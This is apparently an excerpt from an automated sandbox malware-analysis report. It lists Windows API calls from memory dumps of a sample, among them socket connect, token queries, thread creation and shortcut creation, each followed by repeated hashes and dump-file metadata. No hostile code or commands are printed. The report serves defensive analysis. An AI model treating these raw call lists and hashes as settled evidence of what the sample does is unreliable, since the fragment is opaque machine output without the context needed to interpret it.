                                                                                • _wcsstr.LIBCMT ref: 0075DC5C
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                                • String ID:
                                                                                • API String ID: 3902887630-0
                                                                                • Opcode ID: 91aa35ace5fdea513ddad152c08ca15a818e0576262dc087a0b2c9ceec5e671f
                                                                                • Instruction ID: 00d9f8a30ea56d99849d11389fb18bbadda0d121774941b58436aeb7104a39c5
                                                                                • Opcode Fuzzy Hash: 91aa35ace5fdea513ddad152c08ca15a818e0576262dc087a0b2c9ceec5e671f
                                                                                • Instruction Fuzzy Hash: D421F571604100AFEB359B399C49EBB7BA8DF45751F108029FC0ACA191EAE9CC4596A4
                                                                                APIs
                                                                                  • Part of subcall function 0073B34E: GetWindowLongW.USER32(?,000000EB), ref: 0073B35F
                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 0078DEB0
                                                                                • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0078DED4
                                                                                • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0078DEEC
                                                                                • GetSystemMetrics.USER32(00000004), ref: 0078DF14
                                                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,00000000,?,00773A1E,00000000), ref: 0078DF32
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Long$MetricsSystem
                                                                                • String ID:
                                                                                • API String ID: 2294984445-0
                                                                                • Opcode ID: 036d3a2adaad329be94e73723e0d5d9bb2a3750ea27a7c8530551c2584352d0a
                                                                                • Instruction ID: 7b8c3c77a5aae3956f88c0a7094ddf3410ab85c7d6eabf93119eef2f60761bbe
                                                                                • Opcode Fuzzy Hash: 036d3a2adaad329be94e73723e0d5d9bb2a3750ea27a7c8530551c2584352d0a
                                                                                • Instruction Fuzzy Hash: 8A21C171651252AFCB306F788C88BAA3B94FB59724F154324F937CA5E0E7789C50DB80
                                                                                APIs
                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0075BC90
                                                                                • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0075BCC2
                                                                                • __itow.LIBCMT ref: 0075BCDA
                                                                                • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0075BD00
                                                                                • __itow.LIBCMT ref: 0075BD11
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$__itow
                                                                                • String ID:
                                                                                • API String ID: 3379773720-0
                                                                                • Opcode ID: 46636f164737a0342110f77e46f9f58a47cc6ce788db2b079ca0062c8e95fe8f
                                                                                • Instruction ID: 3604fd4dd249f1fccbe1d0537dc3f60717bcc6f45c43e02ccba8e7b55bf26c2d
                                                                                • Opcode Fuzzy Hash: 46636f164737a0342110f77e46f9f58a47cc6ce788db2b079ca0062c8e95fe8f
                                                                                • Instruction Fuzzy Hash: 7721F931700318BADB20AB649C49FEE7A78AF89351F004065FD05EB181DBF88D4987B5
                                                                                APIs
                                                                                  • Part of subcall function 007250E6: _wcsncpy.LIBCMT ref: 007250FA
                                                                                • GetFileAttributesW.KERNEL32(?,?,?,?,007660C3), ref: 00766369
                                                                                • GetLastError.KERNEL32(?,?,?,007660C3), ref: 00766374
                                                                                • CreateDirectoryW.KERNEL32(?,00000000,?,?,?,007660C3), ref: 00766388
                                                                                • _wcsrchr.LIBCMT ref: 007663AA
                                                                                  • Part of subcall function 00766318: CreateDirectoryW.KERNEL32(?,00000000,?,?,?,007660C3), ref: 007663E0
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
                                                                                • String ID:
                                                                                • API String ID: 3633006590-0
                                                                                • Opcode ID: ffa7213351051068f6763d04e463d5f227b4b9db16b7271e9a7323f140c7f972
                                                                                • Instruction ID: 5a1e3ada830a88beb9b0dc664e91f822e9702744aa15ddf04caa70779915de24
                                                                                • Opcode Fuzzy Hash: ffa7213351051068f6763d04e463d5f227b4b9db16b7271e9a7323f140c7f972
                                                                                • Instruction Fuzzy Hash: 79210831904215DBEF21AB79AC46FEA336CEF063A0F904065F807D72C1EB6CDD808A55
                                                                                APIs
                                                                                  • Part of subcall function 0077A82C: inet_addr.WSOCK32(00000000), ref: 0077A84E
                                                                                • socket.WSOCK32(00000002,00000001,00000006), ref: 00778BD3
                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 00778BE2
                                                                                • connect.WSOCK32(00000000,?,00000010), ref: 00778BFE
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLastconnectinet_addrsocket
                                                                                • String ID:
                                                                                • API String ID: 3701255441-0
                                                                                • Opcode ID: 421e614b3a7aa60a770c6071d22f193665ece10e7c07b3eb55f1020a8b43a569
                                                                                • Instruction ID: 22f03ec968a5016b3296c200eb7b68fa0b9ed87f648b3c78a4bea9fcef2ca842
                                                                                • Opcode Fuzzy Hash: 421e614b3a7aa60a770c6071d22f193665ece10e7c07b3eb55f1020a8b43a569
                                                                                • Instruction Fuzzy Hash: C221A1312002149FDB15AF28C849F7D77A9AF89750F04C449F9469B292CB78AC018762
                                                                                APIs
                                                                                • IsWindow.USER32(00000000), ref: 00778441
                                                                                • GetForegroundWindow.USER32 ref: 00778458
                                                                                • GetDC.USER32(00000000), ref: 00778494
                                                                                • GetPixel.GDI32(00000000,?,00000003), ref: 007784A0
                                                                                • ReleaseDC.USER32(00000000,00000003), ref: 007784DB
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: Window$ForegroundPixelRelease
                                                                                • String ID:
                                                                                • API String ID: 4156661090-0
                                                                                • Opcode ID: 015d7feaa5e44b18be3240e4de9c5380571ba14f9f65d31b2d2d3eec2d1e9a1c
                                                                                • Instruction ID: 6be07ab14b08d8a77002fdeda5bf39f073247c3979d12a47eacb747c7d3be7df
                                                                                • Opcode Fuzzy Hash: 015d7feaa5e44b18be3240e4de9c5380571ba14f9f65d31b2d2d3eec2d1e9a1c
                                                                                • Instruction Fuzzy Hash: 5321A435A00204EFDB10DFA4D848A9EBBE5EF89341F04C479F84AD7652DB78AD00CB60
                                                                                APIs
                                                                                • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0073AFE3
                                                                                • SelectObject.GDI32(?,00000000), ref: 0073AFF2
                                                                                • BeginPath.GDI32(?), ref: 0073B009
                                                                                • SelectObject.GDI32(?,00000000), ref: 0073B033
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: ObjectSelect$BeginCreatePath
                                                                                • String ID:
                                                                                • API String ID: 3225163088-0
                                                                                • Opcode ID: e1b0228ffc11ac2f34550f7cd3bce1d07f7c83d3766f9f71c7549090cd318005
                                                                                • Instruction ID: fa0e99a0691a3bcfce8ca92056416191136fd383f2a2833a27a487c2297682d7
                                                                                • Opcode Fuzzy Hash: e1b0228ffc11ac2f34550f7cd3bce1d07f7c83d3766f9f71c7549090cd318005
                                                                                • Instruction Fuzzy Hash: FD2125B0801389EFEB20DF54EC8979E3B68B718351F54C31AF5219A0A1C77D8951CF44
                                                                                APIs
                                                                                • __calloc_crt.LIBCMT ref: 007421A9
                                                                                • CreateThread.KERNEL32(?,?,007422DF,00000000,?,?), ref: 007421ED
                                                                                • GetLastError.KERNEL32 ref: 007421F7
                                                                                • _free.LIBCMT ref: 00742200
                                                                                • __dosmaperr.LIBCMT ref: 0074220B
                                                                                  • Part of subcall function 00747C0E: __getptd_noexit.LIBCMT ref: 00747C0E
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
                                                                                • String ID:
                                                                                • API String ID: 2664167353-0
                                                                                • Opcode ID: 063d3839fb032f15fa8389a2e4eedd07571db0e33a4fd7bd2338b2b649e74531
                                                                                • Instruction ID: cf654cbfdef36e78f47607a3acf235ccb9d9788e4c1c686a86adb6751e6f1580
                                                                                • Opcode Fuzzy Hash: 063d3839fb032f15fa8389a2e4eedd07571db0e33a4fd7bd2338b2b649e74531
                                                                                • Instruction Fuzzy Hash: 69110873204346EF9B25AFA4DC45DAB3799FF41770B100429F91486142EBB9D822C6A1
                                                                                APIs
                                                                                • GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0075ABD7
                                                                                • GetLastError.KERNEL32(?,0075A69F,?,?,?), ref: 0075ABE1
                                                                                • GetProcessHeap.KERNEL32(00000008,?,?,0075A69F,?,?,?), ref: 0075ABF0
                                                                                • HeapAlloc.KERNEL32(00000000,?,0075A69F,?,?,?), ref: 0075ABF7
                                                                                • GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0075AC0E
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                • String ID:
                                                                                • API String ID: 842720411-0
                                                                                • Opcode ID: ba7a5fe70cec4dd62454642101155190723f4f6e6d70c0c48bc20872bf7177b4
                                                                                • Instruction ID: b14d6d4a93658b8004564bae0aadba9c9a466ea5d80c1a67c5ff101eaa0c3af7
                                                                                • Opcode Fuzzy Hash: ba7a5fe70cec4dd62454642101155190723f4f6e6d70c0c48bc20872bf7177b4
                                                                                • Instruction Fuzzy Hash: 8C013C71200204BFDB204FA9DC48DAB3BADEFCA7957104569F946C3260DAB5DC44CBB5
                                                                                APIs
                                                                                • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00767A74
                                                                                • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00767A82
                                                                                • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00767A8A
                                                                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00767A94
                                                                                • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00767AD0
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                • String ID:
                                                                                • API String ID: 2833360925-0
                                                                                • Opcode ID: 7caf7dc4f649c655315cdf9b6740326265ad077e5c4d1bea709b15222495fdbe
                                                                                • Instruction ID: 50e8242950482839222562f9565a78ef82919a07a6966ac3f3842a95168aadc8
                                                                                • Opcode Fuzzy Hash: 7caf7dc4f649c655315cdf9b6740326265ad077e5c4d1bea709b15222495fdbe
                                                                                • Instruction Fuzzy Hash: 8B011731C0461DEBCF14AFE8DC88ADDBB78FB49795F018455E903B2250EB389A51CBA5
                                                                                APIs
                                                                                • CLSIDFromProgID.OLE32 ref: 00759ADC
                                                                                • ProgIDFromCLSID.OLE32(?,00000000), ref: 00759AF7
                                                                                • lstrcmpiW.KERNEL32(?,00000000), ref: 00759B05
                                                                                • CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00759B15
                                                                                • CLSIDFromString.OLE32(?,?), ref: 00759B21
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                • String ID:
                                                                                • API String ID: 3897988419-0
                                                                                • Opcode ID: 00ece4a6a738b574f5c4f64eee65c59e709c02b7eb4ead331a1f34978f6949ef
                                                                                • Instruction ID: 61f4c74da98f6f1f1488937f6c0e916d209066b4abfa91dd4896891f196b9758
                                                                                • Opcode Fuzzy Hash: 00ece4a6a738b574f5c4f64eee65c59e709c02b7eb4ead331a1f34978f6949ef
                                                                                • Instruction Fuzzy Hash: E9012CB6600215FBEB214F54ED44ADABBADEB85752F148024FE06D2210D7B9DD44ABA0
                                                                                APIs
                                                                                • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 0075AA79
                                                                                • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 0075AA83
                                                                                • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 0075AA92
                                                                                • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 0075AA99
                                                                                • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0075AAAF
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                • String ID:
                                                                                • API String ID: 44706859-0
                                                                                • Opcode ID: eee5a1cd3d8b61beb749ebf22e6529b7d13727b2f8bc2fb3e7303f0bc1aca26c
                                                                                • Instruction ID: 5dbcf9339fa580f9b8465f37856457002d479040a12882175fe97cdc0749bc17
                                                                                • Opcode Fuzzy Hash: eee5a1cd3d8b61beb749ebf22e6529b7d13727b2f8bc2fb3e7303f0bc1aca26c
                                                                                • Instruction Fuzzy Hash: 19F044712403087FEB215FA4DC89EB73B6CFF8A755F008529F942C7150D7A49C45CA61
                                                                                APIs
                                                                                • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0075AADA
                                                                                • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0075AAE4
                                                                                • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0075AAF3
                                                                                • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0075AAFA
                                                                                • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0075AB10
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                • String ID:
                                                                                • API String ID: 44706859-0
                                                                                • Opcode ID: c18786b75ce17a6993fc0d435a4ef6d814891f316ab6d0bf3303bc9477522b82
                                                                                • Instruction ID: 18163ef5ba54d64835265da12be9669a525a3d29b55c7f39098f8b48910d9798
                                                                                • Opcode Fuzzy Hash: c18786b75ce17a6993fc0d435a4ef6d814891f316ab6d0bf3303bc9477522b82
                                                                                • Instruction Fuzzy Hash: 91F044712402087FDB210FA4EC88EB73B6EFF86755F004129F942C7150D6A49C058EB1
                                                                                APIs
                                                                                • GetDlgItem.USER32(?,000003E9), ref: 0075EC94
                                                                                • GetWindowTextW.USER32(00000000,?,00000100), ref: 0075ECAB
                                                                                • MessageBeep.USER32(00000000), ref: 0075ECC3
                                                                                • KillTimer.USER32(?,0000040A), ref: 0075ECDF
                                                                                • EndDialog.USER32(?,00000001), ref: 0075ECF9
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                • String ID:
                                                                                • API String ID: 3741023627-0
                                                                                • Opcode ID: 6320b1827376fb8261748a9440c40a1715d49eaa643c83034cf40778246a9024
                                                                                • Instruction ID: ee84945349d9d2c7fd1fe3672cab328a8916e5aa51427f21a6195343320272ac
                                                                                • Opcode Fuzzy Hash: 6320b1827376fb8261748a9440c40a1715d49eaa643c83034cf40778246a9024
                                                                                • Instruction Fuzzy Hash: 6E01D130900714ABEB385B10DE5EBD677B8FB00706F008559B993A18E0DBF8AE88CB54
                                                                                APIs
                                                                                • EndPath.GDI32(?), ref: 0073B0BA
                                                                                • StrokeAndFillPath.GDI32(?,?,0079E680,00000000,?,?,?), ref: 0073B0D6
                                                                                • SelectObject.GDI32(?,00000000), ref: 0073B0E9
                                                                                • DeleteObject.GDI32 ref: 0073B0FC
                                                                                • StrokePath.GDI32(?), ref: 0073B117
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                • String ID:
                                                                                • API String ID: 2625713937-0
                                                                                • Opcode ID: a6819d140cb51a97165d5e956b5d66b8fa0f9b4e8be374edf22ed5a643562b16
                                                                                • Instruction ID: 1248293b9c49306ec4068f2526182df0fb922c327ad50252111256e3f4205eb6
                                                                                • Opcode Fuzzy Hash: a6819d140cb51a97165d5e956b5d66b8fa0f9b4e8be374edf22ed5a643562b16
                                                                                • Instruction Fuzzy Hash: A5F04F70002288EFDB219F65EC4E7993F64A785362F88C314F566884F1CB3D8A66DF18
                                                                                APIs
                                                                                • CoInitialize.OLE32(00000000), ref: 0076F2DA
                                                                                • CoCreateInstance.OLE32(007ADA7C,00000000,00000001,007AD8EC,?), ref: 0076F2F2
                                                                                • CoUninitialize.OLE32 ref: 0076F555
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: CreateInitializeInstanceUninitialize
                                                                                • String ID: .lnk
                                                                                • API String ID: 948891078-24824748
                                                                                • Opcode ID: 4e62be378d7976ab2da010e6f899f831813d6321587abbd2fb10f67d206f2187
